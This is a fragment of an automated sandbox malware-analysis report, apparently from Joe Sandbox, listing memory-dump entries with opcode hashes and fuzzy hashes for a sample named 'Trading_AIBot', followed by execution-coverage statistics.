                                                                                                                                                                                                                                      • Source File: 00000011.00000002.2183024292.0000000002B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B70000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_2b70000_Trading_AIBot.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 6cd5121d236de58892c3dbdae6d49186bae4e2f9557d244d93af533338c29287
                                                                                                                                                                                                                                      • Instruction ID: 163ba3b96e636f8ae6506150b77809164b1cbb54a418b32b508c65bbfa874d3d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6cd5121d236de58892c3dbdae6d49186bae4e2f9557d244d93af533338c29287
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8461E378A40208CFDB44DFA8D5949ADBBF2FF49310F1190A9E815AB369CB30AC06CF10
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000011.00000002.2183024292.0000000002B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B70000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_2b70000_Trading_AIBot.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 336ee8fd92b6a9ccca834ad527c11bda9f6bee9c63d0cb3adfbaa82e99b3ef0f
                                                                                                                                                                                                                                      • Instruction ID: 90604850219de19c88edbf3c1278f6ad1c6ebcd90d3126f005cda82175d80e80
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 336ee8fd92b6a9ccca834ad527c11bda9f6bee9c63d0cb3adfbaa82e99b3ef0f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3D41CBB0D00298DFDB10CFAAC984ADEFBF6AF48310F24806AE419AB254DB349945CF44
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000011.00000002.2183024292.0000000002B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B70000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_2b70000_Trading_AIBot.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 0891e90abebf9905e725a497a21b27ffba814f50a2220564a2dda615ad1cde94
                                                                                                                                                                                                                                      • Instruction ID: 58a2fe50434e9c20521e5b6bf136b83d6cf003991b4c61f924a9462a51e77e21
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0891e90abebf9905e725a497a21b27ffba814f50a2220564a2dda615ad1cde94
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1F41BFB0D00298DFDB14CFA9C984ADDFBB5AF48314F24806AE459BB254DB749945CF44
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000011.00000002.2183024292.0000000002B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B70000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_2b70000_Trading_AIBot.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: Jeq
                                                                                                                                                                                                                                      • API String ID: 0-1775949608
                                                                                                                                                                                                                                      • Opcode ID: 562c97e93ed73088ea85f19afb4093930388ada1756af168b2ae43b6870d5901
                                                                                                                                                                                                                                      • Instruction ID: ffece0c9029fe7e5dd1ade4399b60a9e287fdc86d88dc50a878f9dd7e72fdf28
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 562c97e93ed73088ea85f19afb4093930388ada1756af168b2ae43b6870d5901
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0E410375E002089FCB58DFA8D494AEEBBF6EF89301F1080A9E415B73A4DB359905CF90
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000011.00000002.2183024292.0000000002B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B70000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_2b70000_Trading_AIBot.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: a6a6cfdd468928b48d657a19bad221e55461f551f942f20239c39ea677a5ea6d
                                                                                                                                                                                                                                      • Instruction ID: 58a45c908e1d26f0d79bc48de774e053fcb89680ce0b982d2d36eca309dedbaf
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a6a6cfdd468928b48d657a19bad221e55461f551f942f20239c39ea677a5ea6d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A9B2BE70E112689FCB64EF68C894A9DBBB2BF49304F5085E9D41DA7364DB325E86CF40
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000011.00000002.2183024292.0000000002B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B70000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_2b70000_Trading_AIBot.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 3d3bebc629b32a5e9eb98c35cc41536b893b583d41df56c1d563cb2716839a16
                                                                                                                                                                                                                                      • Instruction ID: 11c5e1ad84146303dcb13447fb91703383ba02547a2a1a411d1a8887f2adc489
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3d3bebc629b32a5e9eb98c35cc41536b893b583d41df56c1d563cb2716839a16
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FFB2BE70E112689FCB64EF68C894A9DBBB2BF49304F5085E9D41DA7364DB325E86CF40
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000011.00000002.2183024292.0000000002B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B70000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_2b70000_Trading_AIBot.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 2b5d2e9691e1fcb8c4b57295f9bfdf47d25fe40c44dabad1e8f71b35063af333
                                                                                                                                                                                                                                      • Instruction ID: 2e06f5e798b63f9a261cbb7443185ff4fa5efdf66f7ae81f6c604d4b4354a1f9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2b5d2e9691e1fcb8c4b57295f9bfdf47d25fe40c44dabad1e8f71b35063af333
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8462BC74A01219DFDB64EF68D994B9DBBB2FB49304F1084E9D40AA7365DB316E82CF40
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000011.00000002.2183024292.0000000002B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B70000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_2b70000_Trading_AIBot.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: a51b92d35754855ccf3fe093c99b2c086b1f3d80bf5fd9ad30190e35443c240d
                                                                                                                                                                                                                                      • Instruction ID: f5badbadd3e55bbb71f2091f3727e26a8f78efbc2056593ef204248c801559ae
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a51b92d35754855ccf3fe093c99b2c086b1f3d80bf5fd9ad30190e35443c240d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CE62BC74A01219DFDB64DF68D994B9DBBB2FB49304F1084E9D40AA7355DB316E82CF40
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000011.00000002.2183024292.0000000002B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B70000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_2b70000_Trading_AIBot.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 6e988a5e14b09650864c588f5758c29c8e86826c3b235d87b430e39e057c5c65
                                                                                                                                                                                                                                      • Instruction ID: dedc3f3c874a50764825f9443260edbe1799c4ebb18185c6cc77ad3b205128b0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6e988a5e14b09650864c588f5758c29c8e86826c3b235d87b430e39e057c5c65
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3641EDB0D04288DFCB14DFEAC984A9EFFF5AF49300F24846AE454AB260DB349985CF40
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000011.00000002.2183024292.0000000002B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B70000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_2b70000_Trading_AIBot.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 30881e7e28f0c31b26b7c3960ad1c3123337d3c7e87951c3f817c1f2689971c4
                                                                                                                                                                                                                                      • Instruction ID: 37ef790ba1fd851828120d065a760af6ecf8830ef0a230372fe42f48838f65c1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 30881e7e28f0c31b26b7c3960ad1c3123337d3c7e87951c3f817c1f2689971c4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 34B1A974E012289FEB64DF68C984B9DBBB2BB49304F1085E9D40DA7355DB30AE86CF51
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000011.00000002.2183024292.0000000002B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B70000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_2b70000_Trading_AIBot.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: b1e8cad1ca7456d0e5479f91ffd19723ff9cb730bb2809752a5b1c90710fbc0e
                                                                                                                                                                                                                                      • Instruction ID: d2640fdb681704d4501224ebe253e6426c4e35fb4599dbf8dd0f546ff1c569c7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b1e8cad1ca7456d0e5479f91ffd19723ff9cb730bb2809752a5b1c90710fbc0e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6951FE78D04208EFDF54DFE8D4946ECBBF6AB49304F10906AE829AB394DB345906CF10
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000011.00000002.2183024292.0000000002B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B70000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_2b70000_Trading_AIBot.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: d7f6ceb1e6cf582ceca60f6e761a322ce0bda9a9e7d27bb6a29b86edf17f68ab
                                                                                                                                                                                                                                      • Instruction ID: 8818d2bb6edebb0cb17839dfc0f8e1e85c1003a58014af3047a344da55dfbe31
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d7f6ceb1e6cf582ceca60f6e761a322ce0bda9a9e7d27bb6a29b86edf17f68ab
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2D41DEB0D00258DFDB14DFAAC584ADEFFF5AF48310F24806AE418AB264DB749985CF54
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000011.00000002.2183024292.0000000002B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B70000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_2b70000_Trading_AIBot.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 97e71d5fe768338a413f22627eded03a81d9d9f4ae63cf6c74b5929b6ecd3d8f
                                                                                                                                                                                                                                      • Instruction ID: 83ee5c97e766f186b3ffda85461f757e4bf0ed7ccb7188cdf7e7a63476ca1a52
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 97e71d5fe768338a413f22627eded03a81d9d9f4ae63cf6c74b5929b6ecd3d8f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4C21D275E002099FCB09DBB4D451AEEB7B2EF89300F1094A9D415B7390DB36AD42CF65
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000011.00000002.2183024292.0000000002B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B70000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_2b70000_Trading_AIBot.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: ab748d20c9b1c9146bfc4c13a078d336ee62615fa087822b8a2c8e98f6814664
                                                                                                                                                                                                                                      • Instruction ID: 24e0daff86adb612390f265a0f2c76ce39b86cc38968bded41ed08d9e8df329d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ab748d20c9b1c9146bfc4c13a078d336ee62615fa087822b8a2c8e98f6814664
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6C21D275E002099FCB19DBB4D491AEEB7B2EF89300F2094A9D415B7390DB36AD46CF61
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000011.00000002.2183024292.0000000002B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B70000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_2b70000_Trading_AIBot.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 3cf09533aedb66ff387dc132328c9b381212cc1d86af9d7981aa4756bfc808e4
                                                                                                                                                                                                                                      • Instruction ID: ea392e5cb14c374aa44b5ea1b216688cc11f80c881858f6c85d0439cc631782e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3cf09533aedb66ff387dc132328c9b381212cc1d86af9d7981aa4756bfc808e4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4D115B70D093858FCB16AFB494583AEBFB0EF46305F1858EAD491A31A2CB781645CB51
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000011.00000002.2183024292.0000000002B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B70000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_2b70000_Trading_AIBot.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 6c43e0354c2479951652dd877ddd2da85c27afa8f81f454e32dd1aba5cac01e7
                                                                                                                                                                                                                                      • Instruction ID: a2aa94bc71b3d6d0f75845caa0ddb353dc5492d6d13980cf7263e490928a0faf
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6c43e0354c2479951652dd877ddd2da85c27afa8f81f454e32dd1aba5cac01e7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1C017874C00209DFCB54EFB8C10C7AEBBB4EB05306F1098AA9825A3290DB780684CF91
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000011.00000002.2183024292.0000000002B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B70000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_2b70000_Trading_AIBot.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: c9ebd5bb210dd881a754f22093541485b6419146eba80e39f36ca25ed470c49f
                                                                                                                                                                                                                                      • Instruction ID: d729591a9179e6aea2c01cd08f68d0cd08b672999a16cef5bde85fc402464f7d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c9ebd5bb210dd881a754f22093541485b6419146eba80e39f36ca25ed470c49f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9FF0F878940255CFCB64DFB4D4487ACBBB4EF4A312F1465AAD519A3260CB309985CF14
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000011.00000002.2183024292.0000000002B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B70000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_2b70000_Trading_AIBot.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: c8f0331674af26bae048178581427cdf8ae6e5023e4b4c8ec22bcf81c89bfdb6
                                                                                                                                                                                                                                      • Instruction ID: e3587b8725ab016bb29be211ea1f6f892ab95af4507ac6a1cbfca0674b48b57a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c8f0331674af26bae048178581427cdf8ae6e5023e4b4c8ec22bcf81c89bfdb6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FEE02271941248DFDB45EFB0DA1A69DBF7AEB00300F1095AED80AA7761CB300F08EB40
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000011.00000002.2183024292.0000000002B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B70000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_2b70000_Trading_AIBot.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 312206bf4e7446832095b117f5ba03d2442bb9fbb7e46a7b77985e37ea4575b7
                                                                                                                                                                                                                                      • Instruction ID: 931cfacb864eaef9957b5ba836825adfe46ce46224512edd9d3c4d2fc9aef88e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 312206bf4e7446832095b117f5ba03d2442bb9fbb7e46a7b77985e37ea4575b7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 22E0C2A2D452448BCB808EB8380A7B8BF64CF57231F4013E8DA6443259EB218513A661
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000011.00000002.2183024292.0000000002B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B70000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_2b70000_Trading_AIBot.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 9d59ab1e699a446de68373c23b79ea43c54ab4ffb856004d578254a9f9053387
                                                                                                                                                                                                                                      • Instruction ID: 08d7c36d9ccbbe711362b84aa339c58ab8dfac2acb0667ac95b12862f2364875
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9d59ab1e699a446de68373c23b79ea43c54ab4ffb856004d578254a9f9053387
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4FE0ED74E101049FCB54EF78E588A98BFB1EB09311F1042E9D90993369DB319946CB40
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000011.00000002.2183024292.0000000002B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B70000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_2b70000_Trading_AIBot.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 11c0c38d0aaed66541839ea6cb66ad6b1ed96fbcf797ad85f49b8570440125d9
                                                                                                                                                                                                                                      • Instruction ID: e7184a3fb0b72b3ed337e60484b2923b1a450b123fe5e958e6c75ad734cef042
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 11c0c38d0aaed66541839ea6cb66ad6b1ed96fbcf797ad85f49b8570440125d9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 04E04878E00204DFC744EF78E548A59BFB5FB09711F1041E9D90893368DB309D45CB40
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000011.00000002.2183024292.0000000002B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B70000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_2b70000_Trading_AIBot.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 1a8f27e2f5b7d39f92b34ee50714f47111aeaa57801a958957443c8495d8f7a7
                                                                                                                                                                                                                                      • Instruction ID: 281989f1c821f39024fa3d064c5dc3c0bb75617f825dd92ceb5aa3e8ae4f0de8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1a8f27e2f5b7d39f92b34ee50714f47111aeaa57801a958957443c8495d8f7a7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 15E0C22194C3C44FC75287B82816BA87F35CF03221F0402EAD094871A2CA21041ADB11
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000011.00000002.2183024292.0000000002B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B70000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_2b70000_Trading_AIBot.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: fc8543535a540a83fb619681f644350dea40301debbb34fd45670931ddea36f4
                                                                                                                                                                                                                                      • Instruction ID: 37b9294d2cf236b1915fa6f78d618915626f9c4abc1794e0ae34b05d11488c9b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fc8543535a540a83fb619681f644350dea40301debbb34fd45670931ddea36f4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F0E08671941208EFCB40EFB4E60565DB7BDEB04304F1085A8D515A3214DF311F44DB80
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000011.00000002.2183024292.0000000002B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B70000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_2b70000_Trading_AIBot.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 92cc65507cd42b74e351680b052d5e8b4d45263bfeca1cd9a4ca9f477ea0d16e
                                                                                                                                                                                                                                      • Instruction ID: 87bd0d68741fbc207b098fc4fa537fdc56b97be63065695b4e821588cfc46735
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 92cc65507cd42b74e351680b052d5e8b4d45263bfeca1cd9a4ca9f477ea0d16e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CCD02E2080A2808FC30B8BA47A05BA47F3CCB03302F2912DBE06A635A2CB300A18C361
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000011.00000002.2183024292.0000000002B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B70000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_2b70000_Trading_AIBot.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 669a78e839da5ca2a8d6249bab122af110479907148c2eb73b314ce322f911e8
                                                                                                                                                                                                                                      • Instruction ID: 33499a406e9cb0e15e43d6b7faf484877e5ccb63ce186483b3f4521eacd2a8d6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 669a78e839da5ca2a8d6249bab122af110479907148c2eb73b314ce322f911e8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 77C012709412099BC650DAA8A405B59BA6CDB02315F401298A51852204DF7155509695
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000011.00000002.2183024292.0000000002B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B70000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_2b70000_Trading_AIBot.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 0afa30134ccc2b0d8d62a5c3d38b4382839eb6fca970eb001137a2515e8c5073
                                                                                                                                                                                                                                      • Instruction ID: 21928f8c1d9f09f5303fe91447bf716f141743e3c474832c55a16cf0fbc4eb91
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0afa30134ccc2b0d8d62a5c3d38b4382839eb6fca970eb001137a2515e8c5073
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D4C08C70C413099BC364DFEAB408B69BB7CE702316F0012A9EA2853204EF715550D7E6

                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                      Execution Coverage:13.5%
                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                      Signature Coverage:8.2%
                                                                                                                                                                                                                                      Total number of Nodes:49
                                                                                                                                                                                                                                      Total number of Limit Nodes:5
